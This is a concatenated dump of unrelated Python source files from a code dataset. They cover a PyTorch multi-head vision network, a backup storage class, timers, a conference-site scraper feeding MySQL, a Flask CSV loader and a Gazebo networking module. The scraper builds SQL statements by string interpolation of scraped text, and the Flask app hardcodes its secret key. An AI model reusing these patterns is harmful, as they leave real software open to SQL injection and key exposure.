depth_pred = depth_pred.squeeze(dim=1)
return depth_outputs.DepthOutput(depth_pred, self.hparams.loss_depth_refine_mult)
class SegmentationHead(nn.Module):
def __init__(self, backbone_output_shape_4x, backbone_output_shape_8x, num_classes, hparams):
super().__init__()
self.head = SemSegFPNHead(
backbone_output_shape_4x,
num_classes=num_classes,
model_norm=hparams.model_norm,
num_filters_scale=hparams.num_filters_scale
)
self.hparams = hparams
def forward(self, features):
pred = self.head.forward(features)
return segmentation_outputs.SegmentationOutput(pred, self.hparams)
class PoseHead(nn.Module):
def __init__(self, backbone_output_shape_4x, backbone_output_shape_8x, hparams):
super().__init__()
self.hparams = hparams
self.heatmap_head = SemSegFPNHead(
backbone_output_shape_4x,
num_classes=1,
model_norm=hparams.model_norm,
num_filters_scale=hparams.num_filters_scale
)
self.vertex_head = PoseFPNHead(
backbone_output_shape_8x,
num_classes=16,
model_norm=hparams.model_norm,
num_filters_scale=hparams.num_filters_scale
)
self.z_centroid_head = PoseFPNHead(
backbone_output_shape_8x,
num_classes=1,
model_norm=hparams.model_norm,
num_filters_scale=hparams.num_filters_scale
)
def forward(self, features):
z_centroid_output = self.z_centroid_head.forward(features).squeeze(dim=1)
heatmap_output = self.heatmap_head.forward(features).squeeze(dim=1)
vertex_output = self.vertex_head.forward(features)
return pose_outputs.PoseOutput(heatmap_output, vertex_output, z_centroid_output, self.hparams)
class OBBHead(nn.Module):
def __init__(self, backbone_output_shape_4x, backbone_output_shape_8x, hparams):
super().__init__()
self.hparams = hparams
self.heatmap_head = SemSegFPNHead(
backbone_output_shape_4x,
num_classes=1,
model_norm=hparams.model_norm,
num_filters_scale=hparams.num_filters_scale
)
self.vertex_head = PoseFPNHead(
backbone_output_shape_8x,
num_classes=16,
model_norm=hparams.model_norm,
num_filters_scale=hparams.num_filters_scale
)
self.z_centroid_head = PoseFPNHead(
backbone_output_shape_8x,
num_classes=1,
model_norm=hparams.model_norm,
num_filters_scale=hparams.num_filters_scale
)
self.rotation_head = PoseFPNHead(
backbone_output_shape_8x,
num_classes=6,
model_norm=hparams.model_norm,
num_filters_scale=hparams.num_filters_scale
)
def forward(self, features):
z_centroid_output = self.z_centroid_head.forward(features).squeeze(dim=1)
heatmap_output = self.heatmap_head.forward(features).squeeze(dim=1)
vertex_output = self.vertex_head.forward(features)
rotation_output = self.rotation_head.forward(features)
return obb_outputs.OBBOutput(
heatmap_output, vertex_output, z_centroid_output, rotation_output, self.hparams
)
class PanopticNet(nn.Module):
def __init__(self, hparams):
super().__init__()
self.hparams = hparams
self.backbone = simplenet.StereoBackbone(hparams)
# ResFPN used p2,p3,p4,p5 (64 channels)
# DRN uses only p2,p3,p4 (no need for p5 since dilation increases striding naturally)
backbone_output_shape_4x = {
#'p0': ShapeSpec(channels=64, height=None, width=None, stride=1),
#'p1': ShapeSpec(channels=64, height=None, width=None, stride=2),
'p2': ShapeSpec(channels=64, height=None, width=None, stride=4),
'p3': ShapeSpec(channels=64, height=None, width=None, stride=8),
'p4': ShapeSpec(channels=64, height=None, width=None, stride=16),
#'p5': ShapeSpec(channels=64, height=None, width=None, stride=32),
}
backbone_output_shape_8x = {
#'p0': ShapeSpec(channels=64, height=None, width=None, stride=1),
#'p1': ShapeSpec(channels=64, height=None, width=None, stride=2),
#'p2': ShapeSpec(channels=64, height=None, width=None, stride=4),
'p3': ShapeSpec(channels=64, height=None, width=None, stride=8),
'p4': ShapeSpec(channels=64, height=None, width=None, stride=16),
#'p5': ShapeSpec(channels=64, height=None, width=None, stride=32),
}
# Add depth head.
self.depth_head = DepthHead(backbone_output_shape_4x, backbone_output_shape_8x, hparams)
# Add segmentation head.
self.seg_head = SegmentationHead(backbone_output_shape_4x, backbone_output_shape_8x, 5, hparams)
# Add pose heads.
self.pose_head = OBBHead(backbone_output_shape_4x, backbone_output_shape_8x, hparams)
def forward(self, image, step):
features = self.backbone.forward(image, step)
small_disp_output = features['small_disp']
small_disp_output = small_disp_output.squeeze(dim=1)
if self.hparams.frozen_stereo_checkpoint is not None:
small_disp_output = small_disp_output.detach()
assert False
small_depth_output = depth_outputs.DepthOutput(small_disp_output, self.hparams.loss_depth_mult)
seg_output = self.seg_head.forward(features)
depth_output = self.depth_head.forward(features)
pose_output = self.pose_head.forward(features)
# TODO(kevin): Remove unused output heads
box_output = None
keypoint_output = None
return seg_output, depth_output, small_depth_output, pose_output, box_output, keypoint_output
| StarcoderdataPython |
13294 | <reponame>kwu83tw/freezer
# (c) Copyright 2014,2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
from oslo_serialization import jsonutils as json
from freezer.storage import physical
class FsLikeStorage(physical.PhysicalStorage, metaclass=abc.ABCMeta):
_type = 'fslike'
def __init__(self, storage_path,
max_segment_size, skip_prepare=False):
super(FsLikeStorage, self).__init__(
storage_path=storage_path,
max_segment_size=max_segment_size,
skip_prepare=skip_prepare)
def prepare(self):
self.create_dirs(self.storage_path)
def info(self):
pass
def write_backup(self, rich_queue, backup):
"""
Stores backup in storage
:type rich_queue: freezer.utils.streaming.RichQueue
:type backup: freezer.storage.base.Backup
"""
backup = backup.copy(storage=self)
path = backup.data_path
self.create_dirs(path.rsplit('/', 1)[0])
with self.open(path, mode='wb') as \
b_file:
for message in rich_queue.get_messages():
b_file.write(message)
def backup_blocks(self, backup):
"""
:param backup:
:type backup: freezer.storage.base.Backup
:return:
"""
with self.open(backup.data_path, 'rb') as backup_file:
while True:
chunk = backup_file.read(self.max_segment_size)
if len(chunk):
yield chunk
else:
break
@abc.abstractmethod
def open(self, filename, mode):
"""
:type filename: str
:param filename:
:type mode: str
:param mode:
:return:
"""
pass
def add_stream(self, stream, package_name, headers=None):
"""
:param stream: data
:param package_name: path
:param headers: backup metadata information
:return:
"""
split = package_name.rsplit('/', 1)
# create backup_basedir
backup_basedir = "{0}/{1}".format(self.storage_path,
package_name)
self.create_dirs(backup_basedir)
# define backup_data_name
backup_basepath = "{0}/{1}".format(backup_basedir,
split[0])
backup_metadata = "%s/metadata" % backup_basedir
# write backup to backup_basepath
with self.open(backup_basepath, 'wb') as backup_file:
for el in stream:
backup_file.write(el)
# write data matadata to backup_metadata
with self.open(backup_metadata, 'wb') as backup_meta:
backup_meta.write(json.dumps(headers))
| StarcoderdataPython |
3333162 | <filename>flowcat/utils/time_timers.py<gh_stars>1-10
"""
Basic functions for working with timestamps and timing functions.
"""
import time
import datetime
import contextlib
import collections
import numpy as np
TIMESTAMP_FORMAT = "%Y%m%d_%H%M%S"
def str_to_date(strdate: str) -> datetime.date:
return datetime.datetime.strptime(strdate, "%Y-%m-%d").date()
def str_to_datetime(strdate: str) -> datetime.datetime:
if len(strdate) == 10:
return datetime.datetime.strptime(strdate, "%Y-%m-%d")
if len(strdate) == 19:
return datetime.datetime.strptime(strdate, "%Y-%m-%dT%H:%M:%S")
return datetime.datetime.strptime(strdate, "%Y-%m-%dT%H:%M:%S.%f")
def create_stamp(stamp: "datetime" = None) -> str:
"""Create timestamp usable for filepaths"""
if stamp is None:
stamp = datetime.datetime.now()
return stamp.strftime(TIMESTAMP_FORMAT)
@contextlib.contextmanager
def timer(title):
"""Take the time for the enclosed block."""
time_a = time.time()
yield
time_b = time.time()
time_diff = time_b - time_a
print(f"{title}: {time_diff:.3}s")
def time_generator_logger(generator, rolling_len=20):
"""Time the given generator.
Args:
generator: Will be executed and results are passed through.
rolling_len: Number of last values for generation of average time.
Returns:
Any value returned from the given generator.
"""
circ_buffer = collections.deque(maxlen=rolling_len)
time_a = time.time()
for res in generator:
time_b = time.time()
time_d = time_b - time_a
circ_buffer.append(time_d)
time_rolling = np.mean(circ_buffer)
print(f"Training time: {time_d}s Rolling avg: {time_rolling}s")
time_a = time_b
yield res
| StarcoderdataPython |
169382 | # coding=utf-8
import redis
import requests
from lxml import etree
import pymysql
import threading
from config import logger
import re
from User_Agent import User_Agent
import random
class Meeting:
# 保留organizer 和 organizer_id两个字段,一个方便链表查询,一个方便直接读取,且可能读取不到组织信息
title = ""
url = ""
start_date = ""
end_date = ""
area = ""
specialties = ""
organizer_id = 0
organizer_url = ""
organizer = ""
class GainDetailInfoThread(threading.Thread):
"""
获取每个会议的详细信息
"""
def __init__(self, thread_name=None):
threading.Thread.__init__(self)
self.headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept - Encoding': 'gzip',
'Cache-Control': 'no-cache',
'User-Agent': random.choice(User_Agent),
'Connection': 'keep-alive',
}
# 创建一个redis链接
self.redis_cli = redis.StrictRedis(host='localhost', port=6379, db=7)
# 创建一个mysql链接
self.mysql_cli = pymysql.connect(host='localhost', port=3306, database='conference', user='root', password='<PASSWORD>', charset='utf8')
self.cursor = self.mysql_cli.cursor()
self.thread_name = thread_name
def run(self):
if self.thread_name:
print self.thread_name + '开始爬取'
self.gain_info()
print self.thread_name + '结束爬取'
def gain_info(self):
"""
获取信息
:return:
"""
# 无限循环从redis中获取数据
i = 1
while True:
print i
i += 1
try:
url = self.redis_cli.spop('backup_urls1')
print url
except Exception as e:
logger.error(e)
logger.error('从redis中取数据出错')
if not url:
break
# 多次尝试打开一个网页,打开就直接跳出,打开失败尝试再次打开
# 实验刚开始
times = 4
html_selector = None
while times > 0:
times -= 1
try:
"""
proxies = { "http": "http://10.10.1.10:3128", "https": "http://10.10.1.10:1080", }
requests.get("http://example.org", proxies=proxies)
"""
content = requests.get(url, headers=self.headers, timeout=10)
# 获取数据
html_selector = etree.HTML(content.text)
print "获取详情页"
break
except Exception as e:
logger.error(e)
logger.error('打开网页失败')
# if len(content.text) == 0:
# return
if not html_selector:
continue
# 存在网页数据, 从中取出需要的数据
# 链接地址
current_url = url
# 会议标题
try:
title = html_selector.xpath('//h1/text()')[0]
title = title.replace("'", "\\\'").replace('"', '\\\"')
# 获取会议的开始日期和结束日期
date_str = html_selector.xpath('//div[@class="date"]/text()')
if date_str:
date_str = date_str[0]
# 获取日期字符串
date_str = date_str.replace(',', ' ').replace('|', ' ').replace('\t', '').strip()
date_str = re.match(r'([^ ]+) ([\d]{1,2}) - ([a-zA-Z]{3})?.*?([\d]{1,2}).*?([\d]{4})', date_str)
if date_str:
month1 = date_str.group(1)
start_day = date_str.group(2)
month2 = date_str.group(3)
end_day = date_str.group(4)
year = date_str.group(5)
# 月份字典,用于将英文月份转化为数字字符串
else:
date_str = "null"
Month = {
'Jan': '01',
'Feb': '02',
'Mar': '03',
'Apr': '04',
'May': '05',
'Jun': '06',
'Jul': '07',
'Aug': '08',
'Sep': '09',
'Oct': '10',
'Nov': '11',
'Dec': '12'
}
# 开始日期和结束日期,格式为'1990-03-20'
if not month2:
start_date = year + '-' + Month.get(month1) + '-' + start_day
end_date = year + '-' + Month.get(month1) + '-' + end_day
else:
start_date = year + '-' + Month.get(month1) + '-' + start_day
end_date = year + '-' + Month.get(month2) + '-' + end_day
# 获取会议举行的地区,(列表)
area = html_selector.xpath('//div[@class="date"]/a/text()')
if area:
# 地区
if len(area)==1:
area = area[0]
else:
area = area[0] + ',' + area[1]
else:
area = "null"
# 组织机构
print area+ "*****************"
organizer = html_selector.xpath('//div[@class="speakers marT10"]/span/a/text()')
if organizer:
organizer = organizer[0]
organizer_url = html_selector.xpath('//div[@class="speakers marT10"]/span/a/@href')[0]
# 学科, 可能有多个学科
specialties_list = html_selector.xpath('//div[@class="speakers"]/span/a/text()')
except Exception as e:
logger.error(e)
logger.error("提取信息错误")
continue
specialities = ''
# 可采用模糊查询得到结果
for spe in specialties_list:
specialities += (spe + ',')
# 最终学科字符串
specialities = specialities.strip(',')
# 获取发言人信息
# speakers_list = html_selector.xpath('//h5/a/text()')
meeting = Meeting()
meeting.url = current_url
meeting.title = title
meeting.start_date = start_date
meeting.end_date = end_date
meeting.area = area
meeting.specialties = specialities
meeting.organizer = organizer
# 根据组织单位的url查找该组织在表中的id
if organizer:
meeting.organizer_url = organizer_url
else:
meeting.organizer_url = "null"
# 保存会议信息,返回会议在会议表中id
meeting_id = self.save_meeting(meeting)
print meeting_id
# 没有查询到id的话,直接结束
if not meeting_id:
continue
# 查找发言人信息
# 查找viewall, 有的话直接发起viewall链接,没有的话查询本页发言人,没有的话直接
viewall = html_selector.xpath('//a[@data-type="speaker"]')
# 有viewall的话,直接访问viewall
if viewall:
print "viewall"
orgSpeakersData = re.findall(r"""conf_speak_data = "(.*?)";""", content.text)[0]
conftypeid = html_selector.xpath('//input[@name="conftypeid"]/@value')[0]
conftype = "Speaking at " + title
speakers_url_list = self.gain_viewall(orgSpeakersData, conftype, conftypeid)
else:
# 没有viewall, 直接查询人物信息
speakers_url_list = html_selector.xpath('//div[@id="speaker_confView"]/div/div/div/a/@href')
if not speakers_url_list:
continue
for speaker_url in speakers_url_list:
self.save_relationship(speaker_url, meeting_id)
def gain_viewall(self, orgSpeakersData, conftype, conftypeid):
"请求发言人信息的viewall"
url = "https://www.emedevents.com/view-all"
print "gain_viewall"
# post请求数据
post_data = {
"orgSpeakersData": orgSpeakersData,
"conftype": conftype,
"conftypeid": conftypeid,
"spr_type": "detail_sat"
}
i = 1
while i <=4:
i += 1
try:
response = requests.post(url, data=post_data, headers=self.headers)
selector = etree.HTML(response.text)
break
except Exception as e:
logger.error(e)
logger.error("查询viewall失败")
selector = None
# 请求失败的话,直接返回
if selector is None:
return
speakers_url_list = selector.xpath('//h3/../@href')
print speakers_url_list
return speakers_url_list
def save_meeting(self, meeting):
"""
保存会议信息, 接受会议对象为参数
:param meeting:
:return: 该会议在数据库中的id
"""
print "save_meetings"
try:
sql = """select id from organizers where url = '%s'""" % meeting.organizer_url
self.cursor.execute(sql)
organizer_id = self.cursor.fetchone()
if not organizer_id:
organizer_id = "null"
insert_sql = """insert into conferences(title, url, start_date, end_date, area, specialties, organizer, organizer_id) VALUES
("%s", "%s", "%s", "%s", "%s", "%s", "%s", %s)""" % (
meeting.title, meeting.url, meeting.start_date, meeting.end_date, meeting.area, meeting.specialties,meeting.organizer,
organizer_id)
else:
organizer_id = organizer_id[0]
insert_sql = """insert into conferences(title, url, start_date, end_date, area, specialties, organizer, organizer_id) VALUES
("%s", "%s", "%s", "%s", "%s", "%s", "%s", %s)""" % (
meeting.title, meeting.url, meeting.start_date, meeting.end_date, meeting.area, meeting.specialties, meeting.organizer,
organizer_id)
self.cursor.execute(insert_sql)
self.mysql_cli.commit()
except Exception as e:
self.mysql_cli.rollback()
logger.error(e)
logger.error("保存会议失败")
try:
sql = """select id from conferences where url = '%s'""" % meeting.url
self.cursor.execute(sql)
conference_table_id = self.cursor.fetchone()
print conference_table_id
conference_table_id = conference_table_id[0]
except Exception as e:
logger.error(e)
logger.error("查询会议失败")
return
return conference_table_id
def save_relationship(self, speaker_url, meetingid):
"""保存人物和会议的多对多关系"""
# 查询人物的id
print "save_relationship"
sql = """select id from speakers where url = '%s'""" % speaker_url
try:
self.cursor.execute(sql)
speaker_table_id = self.cursor.fetchone()
if not speaker_table_id:
return
speaker_table_id = speaker_table_id[0]
# 插入关系字段
sql1 = """insert into conferences_speakers (conference_id, speakers_id) VALUES (%d, %d)""" %(meetingid, speaker_table_id)
self.cursor.execute(sql1)
self.mysql_cli.commit()
except Exception as e:
self.mysql_cli.rollback()
print "查询人物, 写入人-会关系失败"
logger.error(e)
logger.error("查询人物, 写入人-会关系失败")
def __del__(self):
self.cursor.close()
self.mysql_cli.close()
def main():
name_list = ["thread_1", "thread_2", "thread_3"]
thread_list = []
for i in range(3):
meetingspider = GainDetailInfoThread(name_list[i])
thread_list.append(meetingspider)
for thread in thread_list:
thread.setDaemon(True)
thread.start()
for thread in thread_list:
thread.join()
if __name__ == '__main__':
# meeting = GainDetailInfoThread()
# meeting.run()
main()
| StarcoderdataPython |
1740809 | <reponame>andrecianflone/wolf
__author__ = 'max'
from wolf.modules.dequantization.dequantizer import DeQuantizer, UniformDeQuantizer, FlowDeQuantizer
| StarcoderdataPython |
3287673 | # -*- encoding: utf-8 -*-
"""
Copyright (c) 2019 - present AppSeed.us
"""
# Imports
from flask import Flask # manage the app
from sqlalchemy import create_engine # used to detect if table exists
from flask_sqlalchemy import SQLAlchemy # manage the database
import click # used to load the data
import pandas as pd # process pandas
# Invoke Flask magic
app = Flask(__name__)
# App Configuration
app.config['SECRET_KEY'] = 'S_U_perS3crEt_KEY#9999'
# SQLAlchemy Configuration
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite3'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
# DB Object = SQLAlchemy interface
db = SQLAlchemy (app)
# Define the storage
class Data(db.Model):
passengerId = db.Column(db.Integer, primary_key=True )
name = db.Column(db.String(250), nullable=False )
survived = db.Column(db.Integer, nullable=False )
sex = db.Column(db.String(10 ), default=None )
age = db.Column(db.Integer, default=-1 )
fare = db.Column(db.Float, default=-1 )
# Table constructor - called by the custom command 'load_data'
def __init__(self, passengerId, name, survived, sex, age, fare):
self.passengerId = passengerId
self.name = name
self.survived = survived
self.sex = sex
self.age = age
self.fare = fare
# The string representation of the class
def __repr__(self):
return str(self.passengerId) + ' - ' + str(self.name)
# Define the custom command
@app.cli.command("load-data")
@click.argument("fname")
def load_data(fname):
''' Load data from a CSV file '''
print ('*** Load from file: ' + fname)
# Build the Dataframe from pandas
df = pd.read_csv( fname )
# Iterate and load the data
for row in df.itertuples(index=False):
print ( '************************************************' )
v_passengerId = row[0]
v_survived = row[1]
v_name = row[3]
v_sex = row[4]
v_age = row[5]
v_fare = row[9]
print ( 'PassengerId = ' + str( v_passengerId ) )
print ( 'Survived = ' + str( v_survived ) )
print ( 'Name = ' + str( v_name ) )
print ( 'Sex = ' + str( v_sex ) )
print ( 'Age = ' + str( v_age ) )
print ( 'Fare = ' + str( v_fare ) )
# def __init__(self, id, passengerId, name, survived, sex, age, fare):
obj = Data(v_passengerId, v_name, v_survived, v_sex, v_age, v_fare)
db.session.add( obj )
# All good, commit changes
db.session.commit( )
# Default Route
@app.route('/')
def hello_world():
retVal = 'Hello, the database has ('+str( len(Data.query.all()) )+') rows'
retVal += '<br /> See loaded <a href="/data">data</a>.'
return retVal
# Data Route - Shows the loaded information
@app.route('/data')
def data():
retVal = 'Rows = ' + str( len(Data.query.all()) ) + '<br />'
for row in Data.query.all():
retVal += '<br />' + str( row.__repr__() )
return retVal
| StarcoderdataPython |
3228374 | import flamethrower.autograd.call as call
import numpy as _np
notrace_functions = [
_np.ndim, _np.shape, _np.iscomplexobj, _np.result_type
]
def wrap_namespace(old, new):
unchanged_types = {float, int, type(None), type}
for name, obj in old.items():
if obj in notrace_functions:
new[name] = call.Primitive2(obj)
elif callable(obj) and type(obj) is not type:
new[name] = call.Primitive2(obj)
elif type(obj) in unchanged_types:
new[name] = obj
# Wrap numpy
wrap_namespace(_np.__dict__, globals())
| StarcoderdataPython |
11295 | <reponame>robobe/pygazebo
import concurrent
import time
import math
import sys
import asyncio
import logging
from . import msg
from .parse_error import ParseError
from . import DEBUG_LEVEL
logger = logging.getLogger(__name__)
logger.setLevel(DEBUG_LEVEL)
async def _wait_closed(stream):
assert(sys.version_info.major >= 3)
if sys.version_info.minor >= 7:
await stream.wait_closed()
class DisconnectError(Exception):
def __init__(self,
connection_name: str,
server_addr: tuple,
local_addr: tuple,
discarded_bytes: int):
"""
:param connection_name: Name of the connection
:param server_addr: remote address of the connection (address, port)
:type server_addr: tuple[str, int]
:param local_addr: local address of the connection (address, port)
:type local_addr: tuple[str, int]
:param discarded_bytes: number of bytes not read from the socket
"""
self._connection_name = connection_name
self._server_addr = server_addr
self._local_addr = local_addr
self._discarded_bytes = discarded_bytes
@staticmethod
def _to_addr(addr):
return f'{addr[0]}:{addr[1]}'
def __str__(self):
return f'DisconnectError' \
f'({self._connection_name}: {self._to_addr(self._local_addr)} -> {self._to_addr(self._server_addr)})' + \
(f' bytes not collected: {self._discarded_bytes}' if self._discarded_bytes is not None and self._discarded_bytes > 0 else '')
class Server(object):
def __init__(self, name: str):
self._name = name
self._server = None
self._listen_host = None
self._listen_port = None
self._running_server = None
async def serve(self, handler):
"""
Start TCP server
:param handler: called for each new connection. async function
:type handler: async lambda reader, writer -> None
:return:
"""
self._server = await asyncio.start_server(handler, host='0.0.0.0')
self._listen_host, self._listen_port = self._server.sockets[0].getsockname()
logger.info(f"Listening on {self._listen_port}:{self._listen_port}")
self._running_server = asyncio.ensure_future(self._server_loop())
return self._listen_host, self._listen_port
async def _server_loop(self):
if sys.version_info.minor >= 7:
async with self._server:
await self._server.serve_forever()
else:
await self._server.wait_closed()
async def close(self):
self._server.close()
await _wait_closed(self._server)
try:
await self._running_server
except concurrent.futures.CancelledError:
pass
@property
def listen_host(self):
assert self._server is not None
return self._listen_host
@property
def listen_port(self):
assert self._server is not None
return self._listen_port
class Connection(object):
"""Manages a Gazebo protocol connection.
"""
def __init__(self, name):
self.name = name
self._address = None
self._port = None
self._reader = None
self._writer = None
self._closed = True
async def connect(self, address, port):
logger.debug('Connection.connect')
self._address = address
self._port = port
reader, writer = await asyncio.open_connection(address, port)
self.accept_connection(reader, writer)
def accept_connection(self, reader, writer):
self._reader = reader
self._writer = writer
self._closed = False
async def close(self):
if self._closed:
logger.debug("Trying to close an already closed connection")
return
self._closed = True
self._writer.write_eof()
await self._writer.drain()
self._writer.close()
await _wait_closed(self._writer)
async def write_packet(self, name: str, message, timeout):
assert not self._closed
packet = msg.packet_pb2.Packet()
cur_time = time.time()
packet.stamp.sec = int(cur_time)
packet.stamp.nsec = int(math.fmod(cur_time, 1) * 1e9)
packet.type = name.encode()
packet.serialized_data = message.SerializeToString()
await self._write(packet.SerializeToString(), timeout)
async def write(self, message, timeout=None):
data = message.SerializeToString()
await self._write(data, timeout)
async def _write(self, data, timeout):
header = ('%08X' % len(data)).encode()
self._writer.write(header + data)
await asyncio.wait_for(self._writer.drain(), timeout=timeout)
async def read_raw(self):
"""
Read incoming packet without parsing it
:return: byte array of the packet
"""
header = None
try:
assert not self._closed
header = await self._reader.readexactly(8)
if len(header) < 8:
raise ParseError('malformed header: ' + str(header))
try:
size = int(header, 16)
except ValueError:
raise ParseError('invalid header: ' + str(header))
else:
data = await self._reader.readexactly(size)
return data
except (ConnectionResetError, asyncio.streams.IncompleteReadError) as e:
if self._closed:
return None
else:
local_addr, local_port = self._writer.transport.get_extra_info('sockname')
discarded_bytes = len(e.partial) if isinstance(e, asyncio.streams.IncompleteReadError) else None
if header is not None:
discarded_bytes += 8
raise DisconnectError(
connection_name=self.name,
server_addr=(self._address, self._port),
local_addr=(local_port, local_addr),
discarded_bytes=discarded_bytes
) from e
async def read_packet(self):
data = await self.read_raw()
if not self._closed:
packet = msg.packet_pb2.Packet.FromString(data)
return packet
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.